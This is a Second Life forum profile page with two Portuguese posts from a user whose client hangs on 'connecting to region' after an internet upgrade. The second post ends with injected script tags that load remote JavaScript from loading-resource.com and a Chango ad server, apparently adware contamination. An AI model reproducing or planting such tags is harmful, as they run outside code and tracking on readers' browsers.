Jump to content

Pcsiqueiraa

Resident
  • Content Count

    2
  • Joined

  • Last visited

Everything posted by Pcsiqueiraa

  1. Eu entro no meu Second Life e ele fica Conectando á região e nao entra as vezes ele entra só que só funciona numa land e quando eu quero me teleportar pra outra land a barrinha fica carregando e demora muito e quando para o SL cai! Minha net era de 2 megas e agora eu tenho a de 10 megas da net. Quanto eu tinha a de 2 megas nunca aconteçeu isso, mais depois que eu comprei a de 10 megas da net começou a dar isso, e não para. Eu tentei outro avatar mais da a mesma coisa. Oque eu faço pra parar com isso me Ajudem porfavor :(
  2. Eu logo no meu avatar normalmente mais fica la e não sai de conectando a regiao!! Eu comprei uma nova net semana passada antes era de 2 megas agora é de 10 eu não sei se é por isso mais Não entra! <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script id="__changoScript" type="text/javascript">// var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src=( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})(); // </script>
×
×
  • Create New...